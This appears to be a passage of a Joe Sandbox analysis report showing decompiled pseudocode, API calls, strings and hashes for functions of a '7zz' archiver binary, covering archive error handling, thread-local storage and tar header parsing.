                                                                                  0x0047190e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00471910
                                                                                  0x00471913
                                                                                  0x00471916
                                                                                  0x00471918
                                                                                  0x0047191d
                                                                                  0x0047191d
                                                                                  0x00471923
                                                                                  0x00471923
                                                                                  0x00471929
                                                                                  0x0047192a
                                                                                  0x0047192a
                                                                                  0x00471923
                                                                                  0x0047192f
                                                                                  0x00471930
                                                                                  0x00471933
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00471933
                                                                                  0x00471909
                                                                                  0x00471935
                                                                                  0x00471935
                                                                                  0x00471938
                                                                                  0x0047193b
                                                                                  0x0047193b
                                                                                  0x00471941
                                                                                  0x00471944
                                                                                  0x0047194f
                                                                                  0x00471954
                                                                                  0x0047195f
                                                                                  0x00471964
                                                                                  0x00471965
                                                                                  0x00471967
                                                                                  0x0047196c
                                                                                  0x0047196c
                                                                                  0x00000000
                                                                                  0x00471857
                                                                                  0x00471857
                                                                                  0x00471857
                                                                                  0x00471857
                                                                                  0x004719ce
                                                                                  0x004719d0
                                                                                  0x004719dc

                                                                                  APIs
                                                                                    • Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
                                                                                    • Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2
                                                                                  • GetCPInfo.KERNEL32(00000000,?,?,?,00000000,?,?,0046CFEB), ref: 00471881
                                                                                    • Part of subcall function 0046E5CB: LeaveCriticalSection.KERNEL32(?,0046C0D0,00000009,0046C0BC,00000000,?,00000000,00000000,00000000), ref: 0046E5D8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterInfoInitializeLeave
                                                                                  • String ID: 0bI$0bI$@cI$@cI
                                                                                  • API String ID: 1866836854-605000347
                                                                                  • Opcode ID: fb2e5454b5c0239ef892e6083fb739233ab4ecf906b078c2986846cff91fd72d
                                                                                  • Instruction ID: f7c0c694ad5e617c113d7fbc1e97f9e30d3079020f4ba9ff39ded3c73c8e616e
                                                                                  • Opcode Fuzzy Hash: fb2e5454b5c0239ef892e6083fb739233ab4ecf906b078c2986846cff91fd72d
                                                                                  • Instruction Fuzzy Hash: 33415CF16042409EEB21DBBDD8917EA7BE09B05314F25C07BD68D862B2C33D494AC74E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00401BE5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 77%
                                                                                  			E00401BE5(void* __ecx) {
				intOrPtr* _t22;
				char* _t27;
				intOrPtr _t29;
				void* _t45;
				void* _t47;

				L0046B890(0x472d20, _t47);
				_t45 = __ecx;
				L00407CC0( *((intOrPtr*)(__ecx + 0x40)), 0x407ccd);
				_t29 =  *((intOrPtr*)(_t47 + 0xc));
				if(_t29 != 0) {
					E00407CD5( *((intOrPtr*)(__ecx + 0x40)), "Error: ");
					if(_t29 != 1) {
						if(_t29 != 0x8007000e) {
							_t22 = E00401C91(_t47 - 0x18, _t29);
							 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
							E00407CD5( *((intOrPtr*)(__ecx + 0x40)),  *_t22);
							 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
							L00407A18( *((intOrPtr*)(_t47 - 0x18)));
						} else {
							_push("Can\'t allocate required memory");
							goto L5;
						}
					} else {
						_t27 = "Can not open encrypted archive. Wrong password?";
						if( *((char*)(_t47 + 0x10)) == 0) {
							_t27 = "Can not open file as archive";
						}
						_push(_t27);
						L5:
						E00407CD5( *((intOrPtr*)(_t45 + 0x40)));
					}
					L00407CC0( *((intOrPtr*)(_t45 + 0x40)), 0x407ccd);
					 *((intOrPtr*)(_t45 + 0x28)) =  *((intOrPtr*)(_t45 + 0x28)) + 1;
					asm("adc dword [esi+0x2c], 0x0");
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return 0;
			}








                                                                                  0x00401bea
                                                                                  0x00401bf5
                                                                                  0x00401c00
                                                                                  0x00401c05
                                                                                  0x00401c0a
                                                                                  0x00401c14
                                                                                  0x00401c1c
                                                                                  0x00401c3f
                                                                                  0x00401c4d
                                                                                  0x00401c57
                                                                                  0x00401c5b
                                                                                  0x00401c63
                                                                                  0x00401c67
                                                                                  0x00401c41
                                                                                  0x00401c41
                                                                                  0x00000000
                                                                                  0x00401c41
                                                                                  0x00401c1e
                                                                                  0x00401c22
                                                                                  0x00401c27
                                                                                  0x00401c29
                                                                                  0x00401c29
                                                                                  0x00401c2e
                                                                                  0x00401c2f
                                                                                  0x00401c32
                                                                                  0x00401c32
                                                                                  0x00401c71
                                                                                  0x00401c76
                                                                                  0x00401c7a
                                                                                  0x00401c7a
                                                                                  0x00401c86
                                                                                  0x00401c8e

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: Can not open encrypted archive. Wrong password?$Can not open file as archive$Can't allocate required memory$Error:
                                                                                  • API String ID: 3519838083-4253456528
                                                                                  • Opcode ID: f643b0d77a5193f8bda12cef83a72c641e5637254c1606468349ebd7a63f7bd3
                                                                                  • Instruction ID: e96b05d5f5363979fc09c6e311170d97ed88631a387b5d6dedbde536d9aec6cb
                                                                                  • Opcode Fuzzy Hash: f643b0d77a5193f8bda12cef83a72c641e5637254c1606468349ebd7a63f7bd3
                                                                                  • Instruction Fuzzy Hash: 3D11C431A082049BEB24FA65D485A6F77B4AB44728F10493FE142676D1C7BDA8509B1A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046E383 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0046E383() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x48e060);
				if(_t16 == 0) {
					_t16 = L0046FE93(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x48e060, _t16) == 0) {
						E0046D03C(0x10);
					} else {
						E0046E370(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}






                                                                                  0x0046e391
                                                                                  0x0046e399
                                                                                  0x0046e39d
                                                                                  0x0046e3a8
                                                                                  0x0046e3ae
                                                                                  0x0046e3d8
                                                                                  0x0046e3c1
                                                                                  0x0046e3c2
                                                                                  0x0046e3c8
                                                                                  0x0046e3ce
                                                                                  0x0046e3d2
                                                                                  0x0046e3d2
                                                                                  0x0046e3ae
                                                                                  0x0046e3df
                                                                                  0x0046e3e9

                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000103,7FFFFFFF,0047064B,004710B4,00000000,?,?,00000000,00000001), ref: 0046E385
                                                                                  • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0046E393
                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0046E3DF
                                                                                    • Part of subcall function 0046FE93: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046FF89
                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 0046E3B7
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0046E3C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                  • String ID:
                                                                                  • API String ID: 2020098873-0
                                                                                  • Opcode ID: 55fbcf2c7f2f4967b79abaeaadafaeb02b42f847358bd6d886319d930bf8ac5d
                                                                                  • Instruction ID: 886707f6ee56ed2fdb0e8759095dced5a20534092e2ad5f091fc19cf1158f84c
                                                                                  • Opcode Fuzzy Hash: 55fbcf2c7f2f4967b79abaeaadafaeb02b42f847358bd6d886319d930bf8ac5d
                                                                                  • Instruction Fuzzy Hash: BAF062359003219BD7312B32BC0975E3B94EB427A1B10093AF959D67A0EBA888D1869A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00438A2E Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 286COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 75%
                                                                                  			E00438A2E(intOrPtr __ecx, signed char* __edx, void* __eflags) {
				void* __esi;
				signed int _t109;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int* _t124;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				signed int _t140;
				signed int _t143;
				signed int _t146;
				signed int _t150;
				signed int* _t153;
				signed int _t154;
				void* _t156;
				void* _t157;
				signed int* _t176;
				void* _t181;
				void* _t204;
				void* _t219;
				void* _t223;
				void* _t226;
				void* _t227;
				void* _t228;
				intOrPtr _t233;
				signed char** _t240;
				signed int* _t242;
				signed int* _t243;
				void* _t244;
				intOrPtr _t251;
				void* _t253;

				L0046B890(E00478310, _t253);
				_t240 =  *(_t253 + 0xc);
				 *(_t253 + 0xf) =  *(_t253 + 0xf) & 0x00000000;
				 *((intOrPtr*)(_t253 - 0x20)) = __edx;
				_t240[1] = _t240[1] & 0x00000000;
				 *((intOrPtr*)(_t253 - 0x28)) = __ecx;
				 *( *_t240) =  *( *_t240) & 0x00000000;
				 *__edx =  *__edx & 0x00000000;
				 *((intOrPtr*)(_t253 - 0x10)) = 0x200;
				_t109 = E0040FA74(__ecx, _t253 - 0x24c, _t253 - 0x10);
				if(_t109 != 0) {
					L41:
					 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
					return _t109;
				}
				_t251 =  *((intOrPtr*)(_t253 + 8));
				while( *((intOrPtr*)(_t253 - 0x10)) != 0) {
					if( *((intOrPtr*)(_t253 - 0x10)) != 0x200) {
						_push("There is no correct record at the end of archive");
						L12:
						E00409664(_t240);
						L13:
						_t109 = 0;
						goto L41;
					}
					 *((intOrPtr*)(_t251 + 0x68)) =  *((intOrPtr*)(_t251 + 0x68)) + 0x200;
					if(E00438E5B(_t253 - 0x24c) == 0) {
						__eflags =  *(_t253 + 0xf);
						if( *(_t253 + 0xf) == 0) {
							_push(_t251);
							_t219 = 0x64;
							E00438E71(_t253 - 0x24c, _t219);
							_push(_t251 + 0x18);
							_t181 = 8;
							_t114 = E00438E29(_t253 - 0x1e8);
							__eflags = _t114;
							if(_t114 == 0) {
								L26:
								_t109 = 1;
								goto L41;
							}
							_t242 = _t251 + 0x1c;
							_t115 = E00438E29(_t253 - 0x1e0, _t242);
							__eflags = _t115;
							if(_t115 == 0) {
								 *_t242 =  *_t242 & 0x00000000;
								__eflags =  *_t242;
							}
							_t243 = _t251 + 0x20;
							_t116 = E00438E29(_t253 - 0x1d8, _t243);
							__eflags = _t116;
							if(_t116 == 0) {
								 *_t243 =  *_t243 & 0x00000000;
								__eflags =  *_t243;
							}
							__eflags = (((( *(_t253 - 0x1d0) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cf) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1ce) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cd) & 0x000000ff) - 0x80000000;
							_t124 = _t251 + 0x10;
							 *(_t253 + 0xc) = _t124;
							if((((( *(_t253 - 0x1d0) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cf) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1ce) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cd) & 0x000000ff) != 0x80000000) {
								_push(_t124);
								_t223 = 0xc;
								_t125 = E00438DD3(_t253 - 0x1d0, _t223, _t251);
								__eflags = _t125;
								if(_t125 == 0) {
									goto L26;
								}
								goto L22;
							} else {
								_t176 =  *(_t253 + 0xc);
								 *_t176 = ((( *(_t253 - 0x1c8) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c7) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c6) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c5) & 0x000000ff;
								_t176[1] = ((( *(_t253 - 0x1cc) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cb) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1ca) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c9) & 0x000000ff;
								L22:
								_push(_t251 + 0x24);
								_t127 = E00438E29(_t253 - 0x1c4, 0xc);
								__eflags = _t127;
								if(_t127 == 0) {
									goto L26;
								}
								_t129 = E00438E29(_t253 - 0x1b8, _t253 - 0x24);
								__eflags = _t129;
								if(_t129 == 0) {
									goto L26;
								}
								E0046C5C0(_t253 - 0x1b8,  *0x48d374, _t181);
								 *((char*)(_t251 + 0x5c)) =  *((intOrPtr*)(_t253 - 0x1b0));
								_push(_t251 + 0x30);
								_t226 = 0x64;
								E00438E71(_t253 - 0x1af, _t226);
								_t244 = _t251 + 0x54;
								E0046C5C0(_t244, _t253 - 0x14b, _t181);
								_push(_t251 + 0x3c);
								_t227 = 0x20;
								E00438E71(_t253 - 0x143, _t227);
								_push(_t251 + 0x48);
								_t228 = 0x20;
								_t140 = E00438E71(_t253 - 0x123, _t228);
								__eflags =  *((char*)(_t253 - 0x103));
								 *((char*)(_t251 + 0x5d)) = _t140 & 0xffffff00 |  *((char*)(_t253 - 0x103)) != 0x00000000;
								_t143 = E00438E29(_t253 - 0x103, _t251 + 0x28);
								__eflags = _t143;
								if(_t143 == 0) {
									goto L26;
								}
								__eflags =  *((char*)(_t253 - 0xfb));
								 *((char*)(_t251 + 0x5e)) = _t143 & 0xffffff00 |  *((char*)(_t253 - 0xfb)) != 0x00000000;
								_t146 = E00438E29(_t253 - 0xfb, _t251 + 0x2c);
								__eflags = _t146;
								if(_t146 != 0) {
									 *((intOrPtr*)(_t253 - 0x1c)) = 0;
									 *(_t253 - 0x18) = 0;
									 *((intOrPtr*)(_t253 - 0x14)) = 0;
									E00401EEE(_t253 - 0x1c, 3);
									 *((intOrPtr*)(_t253 - 4)) = 0;
									E00438E71(_t253 - 0xf3, 0x9b, _t253 - 0x1c);
									__eflags =  *(_t253 - 0x18);
									if( *(_t253 - 0x18) == 0) {
										L33:
										__eflags =  *((char*)(_t251 + 0x5c)) - 0x31;
										if( *((char*)(_t251 + 0x5c)) == 0x31) {
											_t153 =  *(_t253 + 0xc);
											 *_t153 = 0;
											_t153[1] = 0;
										}
										_t204 = 0;
										_t150 = 0;
										__eflags = 0;
										do {
											_t204 = _t204 + ( *(_t253 + _t150 - 0x24c) & 0x000000ff);
											_t150 = _t150 + 1;
											__eflags = _t150 - 0x200;
										} while (_t150 < 0x200);
										__eflags = _t204 -  *((intOrPtr*)(_t253 - 0x24));
										if(_t204 ==  *((intOrPtr*)(_t253 - 0x24))) {
											__eflags = 0;
											 *((char*)( *((intOrPtr*)(_t253 - 0x20)))) = 1;
										} else {
											_push(1);
											_pop(0);
										}
										L00407A18( *((intOrPtr*)(_t253 - 0x1c)));
										_t109 = 0;
										goto L41;
									}
									_t154 = 0;
									__eflags = 0;
									while(1) {
										_t233 =  *0x48d380; // 0x48d394
										__eflags =  *((intOrPtr*)(_t244 + _t154)) -  *((intOrPtr*)(_t233 + _t154));
										if( *((intOrPtr*)(_t244 + _t154)) !=  *((intOrPtr*)(_t233 + _t154))) {
											goto L33;
										}
										_t154 = _t154 + 1;
										__eflags = _t154 - 5;
										if(_t154 < 5) {
											continue;
										}
										__eflags =  *((char*)(_t251 + 0x5c)) - 0x4c;
										if(__eflags != 0) {
											_push(E00438EA7(_t253 - 0x40, __eflags, 0x2f));
											 *((char*)(_t253 - 4)) = 1;
											_t156 = L0040AFFE(_t253 - 0x4c, _t253 - 0x1c);
											_push(_t251);
											 *((char*)(_t253 - 4)) = 2;
											_t157 = L0040AFFE(_t253 - 0x34, _t156);
											 *((char*)(_t253 - 4)) = 3;
											L00407E17(_t251, _t157);
											L00407A18( *((intOrPtr*)(_t253 - 0x34)));
											L00407A18( *((intOrPtr*)(_t253 - 0x4c)));
											L00407A18( *((intOrPtr*)(_t253 - 0x40)));
										}
										goto L33;
									}
									goto L33;
								}
								goto L26;
							}
						}
						_push("There are data after end of archive");
						goto L12;
					}
					 *(_t253 + 0xf) = 1;
					 *((intOrPtr*)(_t253 - 0x10)) = 0x200;
					_t109 = E0040FA74( *((intOrPtr*)(_t253 - 0x28)), _t253 - 0x24c, _t253 - 0x10);
					if(_t109 == 0) {
						continue;
					}
					goto L41;
				}
				__eflags =  *(_t253 + 0xf);
				if( *(_t253 + 0xf) != 0) {
					goto L13;
				}
				_push("There are no trailing zero-filled records");
				goto L12;
			}



































                                                                                  0x00438a33
                                                                                  0x00438a41
                                                                                  0x00438a44
                                                                                  0x00438a48
                                                                                  0x00438a4d
                                                                                  0x00438a56
                                                                                  0x00438a59
                                                                                  0x00438a5c
                                                                                  0x00438a69
                                                                                  0x00438a6c
                                                                                  0x00438a73
                                                                                  0x00438dc2
                                                                                  0x00438dc8
                                                                                  0x00438dd0
                                                                                  0x00438dd0
                                                                                  0x00438a79
                                                                                  0x00438a7c
                                                                                  0x00438a85
                                                                                  0x00438ac8
                                                                                  0x00438ada
                                                                                  0x00438adc
                                                                                  0x00438ae1
                                                                                  0x00438ae1
                                                                                  0x00000000
                                                                                  0x00438ae1
                                                                                  0x00438a87
                                                                                  0x00438a97
                                                                                  0x00438acf
                                                                                  0x00438ad3
                                                                                  0x00438ae8
                                                                                  0x00438aeb
                                                                                  0x00438af2
                                                                                  0x00438b00
                                                                                  0x00438b03
                                                                                  0x00438b06
                                                                                  0x00438b0b
                                                                                  0x00438b0d
                                                                                  0x00438cdc
                                                                                  0x00438cde
                                                                                  0x00000000
                                                                                  0x00438cde
                                                                                  0x00438b13
                                                                                  0x00438b1f
                                                                                  0x00438b24
                                                                                  0x00438b26
                                                                                  0x00438b28
                                                                                  0x00438b28
                                                                                  0x00438b28
                                                                                  0x00438b2b
                                                                                  0x00438b37
                                                                                  0x00438b3c
                                                                                  0x00438b3e
                                                                                  0x00438b40
                                                                                  0x00438b40
                                                                                  0x00438b40
                                                                                  0x00438b6e
                                                                                  0x00438b73
                                                                                  0x00438b76
                                                                                  0x00438b79
                                                                                  0x00438be5
                                                                                  0x00438be8
                                                                                  0x00438bef
                                                                                  0x00438bf4
                                                                                  0x00438bf6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00438b7b
                                                                                  0x00438bd9
                                                                                  0x00438bde
                                                                                  0x00438be0
                                                                                  0x00438bfc
                                                                                  0x00438c05
                                                                                  0x00438c09
                                                                                  0x00438c0e
                                                                                  0x00438c10
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00438c22
                                                                                  0x00438c27
                                                                                  0x00438c29
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00438c3d
                                                                                  0x00438c4b
                                                                                  0x00438c51
                                                                                  0x00438c54
                                                                                  0x00438c5b
                                                                                  0x00438c66
                                                                                  0x00438c6c
                                                                                  0x00438c7d
                                                                                  0x00438c80
                                                                                  0x00438c81
                                                                                  0x00438c8f
                                                                                  0x00438c92
                                                                                  0x00438c93
                                                                                  0x00438c98
                                                                                  0x00438caa
                                                                                  0x00438cb1
                                                                                  0x00438cb6
                                                                                  0x00438cb8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00438cba
                                                                                  0x00438ccc
                                                                                  0x00438cd3
                                                                                  0x00438cd8
                                                                                  0x00438cda
                                                                                  0x00438ceb
                                                                                  0x00438cee
                                                                                  0x00438cf1
                                                                                  0x00438cf4
                                                                                  0x00438d08
                                                                                  0x00438d0b
                                                                                  0x00438d10
                                                                                  0x00438d13
                                                                                  0x00438d81
                                                                                  0x00438d81
                                                                                  0x00438d85
                                                                                  0x00438d87
                                                                                  0x00438d8a
                                                                                  0x00438d8c
                                                                                  0x00438d8c
                                                                                  0x00438d8f
                                                                                  0x00438d91
                                                                                  0x00438d91
                                                                                  0x00438d93
                                                                                  0x00438d9b
                                                                                  0x00438d9d
                                                                                  0x00438d9e
                                                                                  0x00438d9e
                                                                                  0x00438da5
                                                                                  0x00438da8
                                                                                  0x00438db2
                                                                                  0x00438db4
                                                                                  0x00438daa
                                                                                  0x00438daa
                                                                                  0x00438dac
                                                                                  0x00438dac
                                                                                  0x00438dba
                                                                                  0x00438dc0
                                                                                  0x00000000
                                                                                  0x00438dc0
                                                                                  0x00438d15
                                                                                  0x00438d15
                                                                                  0x00438d17
                                                                                  0x00438d17
                                                                                  0x00438d20
                                                                                  0x00438d23
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00438d25
                                                                                  0x00438d26
                                                                                  0x00438d29
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00438d2b
                                                                                  0x00438d2f
                                                                                  0x00438d3b
                                                                                  0x00438d42
                                                                                  0x00438d46
                                                                                  0x00438d4b
                                                                                  0x00438d51
                                                                                  0x00438d55
                                                                                  0x00438d5d
                                                                                  0x00438d61
                                                                                  0x00438d69
                                                                                  0x00438d71
                                                                                  0x00438d79
                                                                                  0x00438d7e
                                                                                  0x00000000
                                                                                  0x00438d2f
                                                                                  0x00000000
                                                                                  0x00438d17
                                                                                  0x00000000
                                                                                  0x00438cda
                                                                                  0x00438b79
                                                                                  0x00438ad5
                                                                                  0x00000000
                                                                                  0x00438ad5
                                                                                  0x00438aa6
                                                                                  0x00438aaa
                                                                                  0x00438aad
                                                                                  0x00438ab4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00438ab6
                                                                                  0x00438abb
                                                                                  0x00438abf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00438ac1
                                                                                  0x00000000

                                                                                  APIs
                                                                                  Strings
                                                                                  • There are data after end of archive, xrefs: 00438AD5
                                                                                  • There is no correct record at the end of archive, xrefs: 00438AC8
                                                                                  • There are no trailing zero-filled records, xrefs: 00438AC1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: There are data after end of archive$There are no trailing zero-filled records$There is no correct record at the end of archive
                                                                                  • API String ID: 3519838083-3898197850
                                                                                  • Opcode ID: 3ddcd38165be4bcf837a9b22d6199cdc7b4c165d71977855116068728752eb8a
                                                                                  • Instruction ID: 8a8560e65d813f7a5cec42f637569da3f69274a6d4fc9a9a4ce8affac6b4ac77
                                                                                  • Opcode Fuzzy Hash: 3ddcd38165be4bcf837a9b22d6199cdc7b4c165d71977855116068728752eb8a
                                                                                  • Instruction Fuzzy Hash: 92B10070D003599EDB21EB24C891BEEFBB4AF58304F0454AFF445A3282DB78AA49CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040A28C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 97%
                                                                                  			E0040A28C(WCHAR* __ecx, WCHAR** __edx) {
				intOrPtr* _t69;
				signed char _t71;
				void* _t74;
				void* _t78;
				void* _t83;
				signed char _t89;
				WCHAR* _t92;
				WCHAR* _t94;
				long _t95;
				WCHAR* _t96;
				signed int _t97;
				WCHAR* _t100;
				long _t103;
				WCHAR* _t105;
				long _t106;
				WCHAR* _t115;
				signed int _t133;
				signed int _t136;
				WCHAR* _t138;
				signed int _t148;
				WCHAR* _t149;
				signed int* _t153;
				WCHAR** _t156;
				void* _t158;

				L0046B890(0x473b7c, _t158);
				_t156 = __edx;
				 *(_t158 - 0x10) = __ecx;
				 *((intOrPtr*)(__edx + 4)) = 0;
				 *((short*)( *((intOrPtr*)(__edx)))) = 0;
				if( *0x490a7c == 0) {
					 *((intOrPtr*)(_t158 - 0x28)) = 0;
					 *((intOrPtr*)(_t158 - 0x24)) = 0;
					 *((intOrPtr*)(_t158 - 0x20)) = 0;
					E00401EEE(_t158 - 0x28, 3);
					 *(_t158 - 4) = 0;
					_t69 = E00409AD5(_t158 - 0x4c,  *(_t158 - 0x10));
					_t153 =  *(_t158 + 8);
					 *(_t158 - 4) = 1;
					_t71 = E0040A20F( *_t69, _t158 - 0x28, _t153);
					asm("sbb bl, bl");
					 *(_t158 - 4) =  *(_t158 - 4) & 0x00000000;
					L00407A18( *((intOrPtr*)(_t158 - 0x4c)));
					__eflags =  ~_t71 + 1;
					if( ~_t71 + 1 == 0) {
						_t74 = L0040AF39(_t158 - 0x28, _t158 - 0x4c,  *_t153);
						 *(_t158 - 4) = 2;
						E004098A8(_t74);
						 *(_t158 - 4) = 4;
						L00407A18( *((intOrPtr*)(_t158 - 0x4c)));
						_t78 = L0040AF18(_t158 - 0x28, _t158 - 0x58,  *_t153);
						 *(_t158 - 4) = 5;
						E004098A8(_t78);
						 *(_t158 - 4) = 7;
